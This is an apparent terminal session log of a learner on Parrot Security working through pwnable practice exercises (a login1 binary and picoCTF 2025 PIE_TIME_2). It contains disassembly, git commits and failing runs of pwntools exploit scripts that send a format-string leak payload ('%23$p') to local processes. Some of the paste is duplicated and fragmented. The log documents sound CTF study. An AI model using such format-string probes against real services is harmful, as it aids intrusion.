Linux parrot 6.5.0-13parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1                                                                                (2023-12-19) x86_64
 ____                      _     ____
|  _ \ __ _ _ __ _ __ ___ | |_  / ___|  ___  ___
| |_) / _` | '__| '__/ _ \| __| \___ \ / _ \/ __|
|  __/ (_| | |  | | | (_) | |_   ___) |  __/ (__
|_|   \__,_|_|  |_|  \___/ \__| |____/ \___|\___|




The programs included with the Parrot GNU/Linux are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 12 22:02:10 2025 from 192.168.56.1
date

user@parrot(2000) ~
[1:0]$ date
2025年  5月 13日 火曜日 15:55:04 JST

user@parrot(2001) ~
[1:0]$ cat /etc/issue
Parrot Security 6.1 \n \l


user@parrot(2002) ~
[1:0]$ source 20240819/bin/activate
(20240819)
user@parrot(2003) ~
[1:0]$ cd svn/experiment/shokai_security_contest/files/pwnable/99_challs/heap/
Display all 4996 possibilities? (y or n)
(20240819)
user@parrot(2003) ~
[1:0]$ cd svn/experiment/kaidai_pwnable/chapter2/
(20240819)
user@parrot(2004) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ ll
合計 60K
drwxr-xr-x 1 user user 126  5月 12 22:52 ./
drwxr-xr-x 1 user user  16  5月 12 22:19 ../
-rw------- 1 user user  19  5月 12 22:48 .gdb_history
-rwxr--r-- 1 user user 686  5月 12 22:57 exploit_login1.py*
-rw-r--r-- 1 user user   9  5月 12 22:34 flag.txt
-rwxr-xr-x 1 user user 17K  5月 12 22:19 login1*
-rw-r--r-- 1 user user 949  5月 12 22:19 login1.c
-rwxr-xr-x 1 user user 21K  5月 12 22:27 login1_patch*
(20240819)
user@parrot(2005) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ objdump -M intel -d log
login1        login1.c      login1_patch
(20240819)
user@parrot(2005) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ objdump -M intel -d login1_patch | less















































login1_patch:     ファイル形式 elf64-x86-64


セクション .init の逆アセンブル:

0000000000401000 <_init>:
  401000:       f3 0f 1e fa             endbr64
  401004:       48 83 ec 08             sub    rsp,0x8
  401008:       48 8b 05 e9 2f 00 00    mov    rax,QWORD PTR [rip+0x2fe9]                                                                                       # 403ff8 <__gmon_start__>
  40100f:       48 85 c0                test   rax,rax
  401012:       74 02                   je     401016 <_init+0x16>
  401014:       ff d0                   call   rax
  401016:       48 83 c4 08             add    rsp,0x8
  40101a:       c3                      ret

セクション .plt の逆アセンブル:

0000000000401020 <.plt>:
  401020:       ff 35 e2 2f 00 00       push   QWORD PTR [rip+0x2fe2]        # 4                                                                               04008 <_GLOBAL_OFFSET_TABLE_+0x8>
  401026:       ff 25 e4 2f 00 00       jmp    QWORD PTR [rip+0x2fe4]        # 4                                                                               04010 <_GLOBAL_OFFSET_TABLE_+0x10>
  40102c:       0f 1f 40 00             nop    DWORD PTR [rax+0x0]

0000000000401030 <__isoc99_fscanf@plt>:
  401030:       ff 25 e2 2f 00 00       jmp    QWORD PTR [rip+0x2fe2]        # 4                                                                               04018 <__isoc99_fscanf@GLIBC_2.7>
  401036:       68 00 00 00 00          push   0x0
  40103b:       e9 e0 ff ff ff          jmp    401020 <.plt>

0000000000401040 <puts@plt>:
  401040:       ff 25 da 2f 00 00       jmp    QWORD PTR [rip+0x2fda]        # 4                                                                               04020 <puts@GLIBC_2.2.5>
  401046:       68 01 00 00 00          push   0x1
  40104b:       e9 d0 ff ff ff          jmp    401020 <.plt>

0000000000401050 <fclose@plt>:
  401050:       ff 25 d2 2f 00 00       jmp    QWORD PTR [rip+0x2fd2]        # 4                                                                               04028 <fclose@GLIBC_2.2.5>
  401056:       68 02 00 00 00          push   0x2
  40105b:       e9 c0 ff ff ff          jmp    401020 <.plt>

0000000000401060 <printf@plt>:
:...skipping...

login1_patch:     ファイル形式 elf64-x86-64


セクション .init の逆アセンブル:

0000000000401000 <_init>:
  401000:       f3 0f 1e fa             endbr64
  401004:       48 83 ec 08             sub    rsp,0x8
  401008:       48 8b 05 e9 2f 00 00    mov    rax,QWORD PTR [rip+0x2fe9]
  40100f:       48 85 c0                test   rax,rax
  401012:       74 02                   je     401016 <_init+0x16>
  401014:       ff d0                   call   rax
  401016:       48 83 c4 08             add    rsp,0x8
  40101a:       c3                      ret

セクション .plt の逆アセンブル:

0000000000401020 <.plt>:
  401020:       ff 35 e2 2f 00 00       push   QWORD PTR [rip+0x2fe2]        # 4
  401026:       ff 25 e4 2f 00 00       jmp    QWORD PTR [rip+0x2fe4]        # 4
  40102c:       0f 1f 40 00             nop    DWORD PTR [rax+0x0]

0000000000401030 <__isoc99_fscanf@plt>:
  401030:       ff 25 e2 2f 00 00       jmp    QWORD PTR [rip+0x2fe2]        # 4
  401036:       68 00 00 00 00          push   0x0
  40103b:       e9 e0 ff ff ff          jmp    401020 <.plt>

0000000000401040 <puts@plt>:
  401040:       ff 25 da 2f 00 00       jmp    QWORD PTR [rip+0x2fda]        # 4
  401046:       68 01 00 00 00          push   0x1
  40104b:       e9 d0 ff ff ff          jmp    401020 <.plt>

0000000000401050 <fclose@plt>:
  401050:       ff 25 d2 2f 00 00       jmp    QWORD PTR [rip+0x2fd2]        # 4
  401056:       68 02 00 00 00          push   0x2
  40105b:       e9 c0 ff ff ff          jmp    401020 <.plt>

0000000000401060 <printf@plt>:
  401060:       ff 25 ca 2f 00 00       jmp    QWORD PTR [rip+0x2fca]        # 4
  401066:       68 03 00 00 00          push   0x3
  40106b:       e9 b0 ff ff ff          jmp    401020 <.plt>

0000000000401070 <alarm@plt>:
  401070:       ff 25 c2 2f 00 00       jmp    QWORD PTR [rip+0x2fc2]        # 4
  401076:       68 04 00 00 00          push   0x4
  40107b:       e9 a0 ff ff ff          jmp    401020 <.plt>

0000000000401080 <strcmp@plt>:
  401080:       ff 25 ba 2f 00 00       jmp    QWORD PTR [rip+0x2fba]        # 4
  401086:       68 05 00 00 00          push   0x5
  40108b:       e9 90 ff ff ff          jmp    401020 <.plt>

0000000000401090 <gets@plt>:
  401090:       ff 25 b2 2f 00 00       jmp    QWORD PTR [rip+0x2fb2]        # 4
  401096:       68 06 00 00 00          push   0x6
  40109b:       e9 80 ff ff ff          jmp    401020 <.plt>

00000000004010a0 <setvbuf@plt>:
  4010a0:       ff 25 aa 2f 00 00       jmp    QWORD PTR [rip+0x2faa]        # 4
  4010a6:       68 07 00 00 00          push   0x7
  4010ab:       e9 70 ff ff ff          jmp    401020 <.plt>

00000000004010b0 <fopen@plt>:
  4010b0:       ff 25 a2 2f 00 00       jmp    QWORD PTR [rip+0x2fa2]        # 4
  4010b6:       68 08 00 00 00          push   0x8
  4010bb:       e9 60 ff ff ff          jmp    401020 <.plt>

00000000004010c0 <exit@plt>:
...skipping...
  4010f8:       ff 15 f2 2e 00 00       call   QWORD PTR [rip+0x2ef2]        # 4
  4010fe:       f4                      hlt
  4010ff:       90                      nop

0000000000401100 <_dl_relocate_static_pie>:
  401100:       f3 0f 1e fa             endbr64
  401104:       c3                      ret
  401105:       66 2e 0f 1f 84 00 00    cs nop WORD PTR [rax+rax*1+0x0]
  40110c:       00 00 00
  40110f:       90                      nop

0000000000401110 <deregister_tm_clones>:
  401110:       b8 78 40 40 00          mov    eax,0x404078
  401115:       48 3d 78 40 40 00       cmp    rax,0x404078
  40111b:       74 13                   je     401130 <deregister_tm_clones+0x20
  40111d:       b8 00 00 00 00          mov    eax,0x0
  401122:       48 85 c0                test   rax,rax
  401125:       74 09                   je     401130 <deregister_tm_clones+0x20
  401127:       bf 78 40 40 00          mov    edi,0x404078
  40112c:       ff e0                   jmp    rax
  40112e:       66 90                   xchg   ax,ax
  401130:       c3                      ret
  401131:       66 66 2e 0f 1f 84 00    data16 cs nop WORD PTR [rax+rax*1+0x0]
  401138:       00 00 00 00
  40113c:       0f 1f 40 00             nop    DWORD PTR [rax+0x0]

0000000000401140 <register_tm_clones>:
  401140:       be 78 40 40 00          mov    esi,0x404078
  401145:       48 81 ee 78 40 40 00    sub    rsi,0x404078
  40114c:       48 89 f0                mov    rax,rsi
  40114f:       48 c1 ee 3f             shr    rsi,0x3f
  401153:       48 c1 f8 03             sar    rax,0x3
  401157:       48 01 c6                add    rsi,rax
  40115a:       48 d1 fe                sar    rsi,1
  40115d:       74 11                   je     401170 <register_tm_clones+0x30>
  40115f:       b8 00 00 00 00          mov    eax,0x0
  401164:       48 85 c0                test   rax,rax
  401167:       74 07                   je     401170 <register_tm_clones+0x30>
  401169:       bf 78 40 40 00          mov    edi,0x404078
  40116e:       ff e0                   jmp    rax
  401170:       c3                      ret
  401171:       66 66 2e 0f 1f 84 00    data16 cs nop WORD PTR [rax+rax*1+0x0]
  401178:       00 00 00 00
  40117c:       0f 1f 40 00             nop    DWORD PTR [rax+0x0]

0000000000401180 <__do_global_dtors_aux>:
  401180:       f3 0f 1e fa             endbr64
  401184:       80 3d 1d 2f 00 00 00    cmp    BYTE PTR [rip+0x2f1d],0x0
...skipping...
000000000040128c <main>:
  40128c:       55                      push   rbp
  40128d:       48 89 e5                mov    rbp,rsp
  401290:       48 83 ec 50             sub    rsp,0x50
  401294:       48 c7 45 d0 00 00 00    mov    QWORD PTR [rbp-0x30],0x0
  40129b:       00

000000000040128c <main>:
  40128c:       55                      push   rbp
  40128d:       48 89 e5                mov    rbp,rsp
  401290:       48 83 ec 50             sub    rsp,0x50
  401294:       48 c7 45 d0 00 00 00    mov    QWORD PTR [rbp-0x30],0x0
  40129b:       00
  40129c:       48 c7 45 d8 00 00 00    mov    QWORD PTR [rbp-0x28],0x0
  4012a3:       00
  4012a4:       48 c7 45 e0 00 00 00    mov    QWORD PTR [rbp-0x20],0x0
  4012ab:       00
  4012ac:       48 c7 45 e8 00 00 00    mov    QWORD PTR [rbp-0x18],0x0
  4012b3:       00
  4012b4:       48 c7 45 b0 00 00 00    mov    QWORD PTR [rbp-0x50],0x0
  4012bb:       00
  4012bc:       48 c7 45 b8 00 00 00    mov    QWORD PTR [rbp-0x48],0x0
  4012c3:       00
  4012c4:       48 c7 45 c0 00 00 00    mov    QWORD PTR [rbp-0x40],0x0
  4012cb:       00
  4012cc:       48 c7 45 c8 00 00 00    mov    QWORD PTR [rbp-0x38],0x0
  4012d3:       00
  4012d4:       c7 45 fc 00 00 00 00    mov    DWORD PTR [rbp-0x4],0x0
  4012db:       b8 00 00 00 00          mov    eax,0x0
  4012e0:       e8 d1 fe ff ff          call   4011b6 <setup>
00000000004011b6 <setup>:
  4011b6:       55                      push   rbp
  4011b7:       48 89 e5                mov    rbp,rsp
  4011ba:       48 83 ec 10             sub    rsp,0x10
  4011be:       48 c7 45 f8 00 00 00    mov    QWORD PTR [rbp-0x8],0x0
  4011c5:       00
  4011c6:       bf 3c 00 00 00          mov    edi,0x3c
  4011cb:       e8 a0 fe ff ff          call   401070 <alarm@plt>
  4011d0:       48 8b 05 b9 2e 00 00    mov    rax,QWORD PTR [rip+0x2eb9]
  4011d7:       b9 00 00 00 00          mov    ecx,0x0
  4011dc:       ba 02 00 00 00          mov    edx,0x2
  4011e1:       be 00 00 00 00          mov    esi,0x0
  4011e6:       48 89 c7                mov    rdi,rax
  4011e9:       e8 b2 fe ff ff          call   4010a0 <setvbuf@plt>
  4011ee:       48 8b 05 8b 2e 00 00    mov    rax,QWORD PTR [rip+0x2e8b]
  4011f5:       b9 00 00 00 00          mov    ecx,0x0
  4011fa:       ba 02 00 00 00          mov    edx,0x2
  4011ff:       be 00 00 00 00          mov    esi,0x0
  401204:       48 89 c7                mov    rdi,rax
  401207:       e8 94 fe ff ff          call   4010a0 <setvbuf@plt>
  40120c:       48 8b 05 8d 2e 00 00    mov    rax,QWORD PTR [rip+0x2e8d]
  401213:       b9 00 00 00 00          mov    ecx,0x0
  401218:       ba 02 00 00 00          mov    edx,0x2
  40121d:       be 00 00 00 00          mov    esi,0x0
  401222:       48 89 c7                mov    rdi,rax
  401225:       e8 76 fe ff ff          call   4010a0 <setvbuf@plt>
  40122a:       48 8d 35 d3 0d 00 00    lea    rsi,[rip+0xdd3]        # 402004 <
  401231:       48 8d 3d cf 0d 00 00    lea    rdi,[rip+0xdcf]        # 402007 <
  401238:       e8 73 fe ff ff          call   4010b0 <fopen@plt>
  40123d:       48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax
  401241:       48 83 7d f8 00          cmp    QWORD PTR [rbp-0x8],0x0
  401246:       75 16                   jne    40125e <setup+0xa8>
  401248:       48 8d 3d c1 0d 00 00    lea    rdi,[rip+0xdc1]        # 402010 <
  40124f:       e8 ec fd ff ff          call   401040 <puts@plt>
  401254:       bf 00 00 00 00          mov    edi,0x0
  401259:       e8 62 fe ff ff          call   4010c0 <exit@plt>
  40125e:       48 8b 45 f8             mov    rax,QWORD PTR [rbp-0x8]
  401262:       48 8d 15 57 2e 00 00    lea    rdx,[rip+0x2e57]        # 4040c0
  401269:       48 8d 35 b8 0d 00 00    lea    rsi,[rip+0xdb8]        # 402028 <
  401270:       48 89 c7                mov    rdi,rax
  401273:       b8 00 00 00 00          mov    eax,0x0
  401278:       e8 b3 fd ff ff          call   401030 <__isoc99_fscanf@plt>
  40127d:       48 8b 45 f8             mov    rax,QWORD PTR [rbp-0x8]
  401281:       48 89 c7                mov    rdi,rax
  401284:       e8 c7 fd ff ff          call   401050 <fclose@plt>
  401289:       90                      nop
  40128a:       c9                      leave

the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 12 22:02:10 2025 from 192.168.56.1
date

user@parrot(2000) ~
[1:0]$ date
2025年  5月 13日 火曜日 15:55:04 JST

user@parrot(2001) ~
[1:0]$ cat /etc/issue
Parrot Security 6.1 \n \l


user@parrot(2002) ~
[1:0]$ source 20240819/bin/activate
(20240819)
user@parrot(2003) ~
[1:0]$ cd svn/experiment/shokai_security_contest/files/pwnable/99_challs/heap/
Display all 4996 possibilities? (y or n)
(20240819)
user@parrot(2003) ~
[1:0]$ cd svn/experiment/kaidai_pwnable/chapter2/
(20240819)
user@parrot(2004) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ ll
合計 60K
drwxr-xr-x 1 user user 126  5月 12 22:52 ./
drwxr-xr-x 1 user user  16  5月 12 22:19 ../
-rw------- 1 user user  19  5月 12 22:48 .gdb_history
-rwxr--r-- 1 user user 686  5月 12 22:57 exploit_login1.py*
-rw-r--r-- 1 user user   9  5月 12 22:34 flag.txt
-rwxr-xr-x 1 user user 17K  5月 12 22:19 login1*
-rw-r--r-- 1 user user 949  5月 12 22:19 login1.c
-rwxr-xr-x 1 user user 21K  5月 12 22:27 login1_patch*
(20240819)
user@parrot(2005) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ objdump -M intel -d log
login1        login1.c      login1_patch
(20240819)
user@parrot(2005) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ objdump -M intel -d login1_patch | less
(20240819)
user@parrot(2006) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cp log
login1        login1.c      login1_patch
(20240819)
user@parrot(2006) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cp login1
login1        login1.c      login1_patch
(20240819)
user@parrot(2006) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ cp login1_patch login1_patch_nop
(20240819)
user@parrot(2007) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ ll
合計 108K
drwxr-xr-x 1 user user 198  5月 13 16:01 ./
drwxr-xr-x 1 user user  16  5月 12 22:19 ../
-rw------- 1 user user  19  5月 12 22:48 .gdb_history
-rwxr--r-- 1 user user 686  5月 12 22:57 exploit_login1.py*
-rw-r--r-- 1 user user   9  5月 12 22:34 flag.txt
-rwxr-xr-x 1 user user 17K  5月 12 22:19 login1*
-rw-r--r-- 1 user user 949  5月 12 22:19 login1.c
-rwxr-xr-x 1 user user 21K  5月 12 22:27 login1_patch*
-rwxr-xr-x 1 user user 21K  5月 13 16:01 login1_patch_nop*
-rwxr--r-- 1 user user 21K  5月 13 15:59 login1_patch_nop.bak*
(20240819)
user@parrot(2008) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ git add exploit_login1.py flag.txt login1 login1.c login1_patch login1_pa
(20240819)
user@parrot(2009) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ git st
On branch main
Your branch is up to date with 'origin/main'.

Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
        new file:   exploit_login1.py
        new file:   flag.txt
        new file:   login1
        new file:   login1.c
        new file:   login1_patch
        new file:   login1_patch_nop

Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   ../../python/exploit_pwntools.py
        modified:   ../../shokai_security_contest/files/pwnable/99_challs/vulnfu

Untracked files:
  (use "git add <file>..." to include in what will be committed)
        ../../book_Binary/
        ../../c/input1.c
        ../../c/input2.c
        login1_patch_nop.bak
        ../../python/core
        ../../python/exploit_sbof_pivot.bin
        ../../python/exploit_sbof_pivot.py
        ../../python/exploit_sbof_pivot_draft.py
        ../../python/finance.py
        ../../python/investment_simulation.csv
        ../../python/pwnable_template.py
        ../../python/sbof_pivot
        ../../rust/

(20240819)
user@parrot(2010) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ rm login1_patch_nop.bak
(20240819)
user@parrot(2011) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ git commit -am "kaidai_2"
[main d10c6e0] kaidai_2
 8 files changed, 140 insertions(+), 2 deletions(-)
 create mode 100755 kaidai_pwnable/chapter2/exploit_login1.py
 create mode 100644 kaidai_pwnable/chapter2/flag.txt
 create mode 100755 kaidai_pwnable/chapter2/login1
 create mode 100644 kaidai_pwnable/chapter2/login1.c
 create mode 100755 kaidai_pwnable/chapter2/login1_patch
 create mode 100755 kaidai_pwnable/chapter2/login1_patch_nop
(20240819)
user@parrot(2012) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ git push
Enumerating objects: 27, done.
Counting objects: 100% (27/27), done.
Delta compression using up to 2 threads
Compressing objects: 100% (15/15), done.
Writing objects: 100% (18/18), 6.26 KiB | 213.00 KiB/s, done.
Total 18 (delta 8), reused 0 (delta 0), pack-reused 0
remote: Resolving deltas: 100% (8/8), completed with 4 local objects.
To github.com:dk0893/experiment.git
   b143933..d10c6e0  main -> main
(20240819)
user@parrot(2013) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ ll
合計 84K
drwxr-xr-x 1 user user 158  5月 13 16:18 ./
drwxr-xr-x 1 user user  16  5月 12 22:19 ../
-rw------- 1 user user  19  5月 12 22:48 .gdb_history
-rwxr--r-- 1 user user 686  5月 13 16:49 exploit_login1.py*
-rw-r--r-- 1 user user   9  5月 12 22:34 flag.txt
-rwxr-xr-x 1 user user 17K  5月 12 22:19 login1*
-rw-r--r-- 1 user user 949  5月 12 22:19 login1.c
-rwxr-xr-x 1 user user 21K  5月 12 22:27 login1_patch*
-rwxr-xr-x 1 user user 21K  5月 13 16:01 login1_patch_nop*
(20240819)
user@parrot(2014) ~/svn/experiment/kaidai_pwnable/chapter2
[1:0]$ tmux











































[2:0]$ cd -
/home/user/svn/experiment/kaidai_pwnable/chapter2
(20240819)
user@parrot(2003) ~/svn/experiment/kaidai_pwnable/chapter2
[2:0]$ pytho
python                                        python3
python-argcomplete-check-easy-install-script  python3-config
python-argcomplete-tcsh                       python3-futurize
python-dotenv                                 python3-pasteurize
(20240819)
user@parrot(2003) ~/svn/experiment/kaidai_pwnable/chapter2
[2:0]$ python exploit_login1.py
[*] '/home/user/svn/experiment/kaidai_pwnable/chapter2/login1'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No
[x] Starting local process '/usr/bin/gdbserver' argv=[b'/usr/bin/gdbserver', b'--mu                                                                            zation', b'--no-startup-with-shell', b'localhost[+]  b'./login1'] : pid 381745
[DEBUG] Received 0x3f bytes:
    b'Process ./login1 created; pid = 381748\n'
    b'Listening on port 34405\n'
[DEBUG] Wrote gdb script to '/tmp/pwnlib-gdbscript-n5x1e9k1.gdb'
    target remote 127.0.0.1:34405
[*] running in new terminal: ['/usr/bin/gdb', '-q', './login1', '-x', '/tmp/pwnlib-
[DEBUG] Created script for new terminal:
    #!/home/user/20240819/bin/python
    import os
    os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './login1', '-x', '/tmp/pwnlib
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'splitw', '-h', '-F#{pane_pid}'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWar
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x38 bytes:
    b'Remote debugging from host ::ffff:127.0.0.1, port 42050\n'
^CTraceback (most recent call last):
  File "/home/user/svn/experiment/kaidai_pwnable/chapter2/exploit_login1.py", line
    main()
  File "/home/user/svn/experiment/kaidai_pwnable/chapter2/exploit_login1.py", line
    attack( proc )
  File "/home/user/svn/experiment/kaidai_pwnable/chapter2/exploit_login1.py", line
    proc.sendlineafter( 'ID: ', id.encode() )
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    res = self.recvuntil(delim, timeout=timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    res = self.recv(timeout=self.timeout)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    return self._recv(numb, timeout) or b''
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    if not self.buffer and not self._fillbuffer(timeout):
                               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py", lin
    data = self.recv_raw(self.buffer.get_fill_size())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/process.py",
    if not self.can_recv_raw(self.timeout):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
picoCTF2025_BinaryExploitation/ picoCTF2025_GeneralSkills/      picoCTF2025_Reverse
(20240819)
user@parrot(2004) ~/svn/experiment/kaidai_pwnable/chapter2
[2:130]$ cd ../../picoCTF/picoCTF2025_BinaryExploitation/
PIE_TIME/   PIE_TIME_2/
(20240819)
user@parrot(2004) ~/svn/experiment/kaidai_pwnable/chapter2
[2:130]$ cd ../../picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2/
(20240819)
user@parrot(2005) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_
[2:0]$ ll
合計 36K
drwxr-xr-x 1 user user  102  5月 13 17:16 ./
drwxr-xr-x 1 user user  342  3月 18 21:34 ../
-rw------- 1 user user  183  3月 16 18:54 .gdb_history
-rwxr--r-- 1 user user 2.4K  5月 13 16:52 exploit_pie_time_2.py*
-rwxr--r-- 1 user user   17  3月  9 20:37 flag.txt*
-rwxr--r-- 1 user user  17K  3月 15 22:32 vuln*
-rwxr--r-- 1 user user  939  3月 15 22:32 vuln.c*
(20240819)
user@parrot(2006) ~/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_
[2:0]$ pytho
python                                        python-dotenv
[DEBUG] Wrote gdb script to '/tmp/pwnlib-gdbscript-ccsk6y_f.gdb'
    target remote 127.0.0.1:36623
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-gd
[DEBUG] Created script for new terminal:
    #!/home/user/20240819/bin/python
    import os
    os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-g
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'splitw', '-h', '-F#{pane_pid}'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWar
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x38 bytes:
    b'Remote debugging from host ::ffff:127.0.0.1, port 34588\n'
[DEBUG] Sent 0x6 bytes:
    b'%23$p\n'
[*] type(addr)=<class 'str'>, addr=:ffff:127.0.0.1, port 34588
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    addr_main = int( addr, 16 )
                ^^^^^^^^^^^^^^^
ValueError: invalid literal for int() with base 16: ':ffff:127.0.0.1, port 34588\n'
    target remote 127.0.0.1:37279
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-gd
[DEBUG] Created script for new terminal:
    #!/home/user/20240819/bin/python
    import os
    os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-g
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'splitw', '-h', '-F#{pane_pid}'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWar
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x38 bytes:
    b'Remote debugging from host ::ffff:127.0.0.1, port 53248\n'
[DEBUG] Sent 0x6 bytes:
    b'%23$p\n'
[*] type(addr)=<class 'str'>, addr=:ffff:127.0.0.1, port 53248
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    addr_main = int( addr, 16 )
                ^^^^^^^^^^^^^^^
ValueError: invalid literal for int() with base 16: ':ffff:127.0.0.1, port 53248\n'
[DEBUG] Wrote gdb script to '/tmp/pwnlib-gdbscript-iqhzms00.gdb'
    target remote 127.0.0.1:38045
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-gd
[DEBUG] Created script for new terminal:
    #!/home/user/20240819/bin/python
    import os
    os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-g
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'splitw', '-h', '-F#{pane_pid}'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWar
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x38 bytes:
    b'Remote debugging from host ::ffff:127.0.0.1, port 54174\n'
[DEBUG] Sent 0x6 bytes:
    b'%23$p\n'
[*] type(addr)=<class 'str'>, addr=:ffff:127.0.0.1, port 54174
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    addr_main = int( addr, 16 )
                ^^^^^^^^^^^^^^^
[DEBUG] Wrote gdb script to '/tmp/pwnlib-gdbscript-18aykcgo.gdb'
    target remote 127.0.0.1:40599
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-gd
[DEBUG] Created script for new terminal:
    #!/home/user/20240819/bin/python
    import os
    os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '-x', '/tmp/pwnlib-g
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'splitw', '-h', '-F#{pane_pid}'
/home/user/20240819/lib/python3.11/site-packages/pwnlib/tubes/tube.py:841: BytesWar
  res = self.recvuntil(delim, timeout=timeout)
[DEBUG] Received 0x38 bytes:
    b'Remote debugging from host ::ffff:127.0.0.1, port 42184\n'
[DEBUG] Sent 0x6 bytes:
    b'%23$p\n'
[*] type(addr)=<class 'str'>, addr=:ffff:127.0.0.1, port 42184
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    addr_main = int( addr, 16 )
                ^^^^^^^^^^^^^^^
    b'%23$p\n'
[*] type(addr)=<class 'str'>, addr=:ffff:127.0.0.1, port 44648
Traceback (most recent call last):
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    main()
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    attack( proc )
  File "/home/user/svn/experiment/picoCTF/picoCTF2025_BinaryExploitation/PIE_TIME_2
    addr_main = int( addr, 16 )
                ^^^^^^^^^^^^^^^
ValueError: invalid literal for int() with base 16: ':ffff:127.0.0.1, port 44648\n'
[*] Process '/usr/bin/gdbserver' stopped with exit code 0 (pid 389508)
(20240819)
